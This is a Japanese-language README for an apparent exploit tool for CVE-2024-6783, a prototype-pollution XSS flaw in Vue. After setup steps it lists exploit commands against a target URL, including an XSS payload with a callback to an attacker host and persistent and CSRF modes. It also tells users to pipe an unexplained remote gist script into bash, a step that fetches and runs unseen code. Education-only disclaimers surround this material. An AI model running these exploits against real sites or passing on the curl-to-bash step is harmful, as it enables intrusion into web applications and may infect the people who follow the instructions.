Vueに脆弱性が発見されました。これにより、攻撃者はプロトタイプ汚染を介してXSSを実行できます。攻撃者は、Object.prototype.staticClass や Object.prototype.staticStyle などの一部のプロパティのプロトタイプチェーンを変更し、任意のJavaScriptコードを実行する可能性があります。
このプロジェクトの維持をPayPalまたは下のQRコードをスキャンしてサポートしてください。
このプロジェクトは、以下のような安全で許可された環境でのみ使用してください:
設定例:
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
使用例:
# scan only
python cve-2024-6783.py -u https://example.com -v
# Scan & XSS Exploit
python cve-2024-6783.py -u https://example.com -e xss
# XSS Exploit with Callback
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback
# Automatic Callback Server
python cve-2024-6783.py -u https://example.com -e persistent -c auto
# CSRF Exploitation
python cve-2024-6783.py -u https://example.com -e csrf
# Full Scan and Exploit with Verbose Output
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html
注意:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y を実行してネストされた .git ディレクトリをクリアする必要があります。制御された環境でサイバーセキュリティの概念を学習、テスト、研究するためのリポジトリです。
このリポジトリは教育および許可されたセキュリティ研究のみを目的としています。
これはユーザーが以下について学ぶのを支援するために設計されています:
このリポジトリは、以下のように許可がある環境でのみ使用してください:
不正または違法な使用は固く禁止されています。
著者および貢献者は、このプロジェクトによって生じたいかなる損害、誤用、法的問題、または損失についても責任を負いません。
このリポジトリを使用することにより、あなたは以下に同意するものとします:
このプロジェクトは以下を目的としています:
責任ある開示の慣行に従い、適用されるすべての法律を遵守してください。
責任ある開示やコラボレーションについては、GitHubを通じてリポジトリのメンテナーに連絡してください。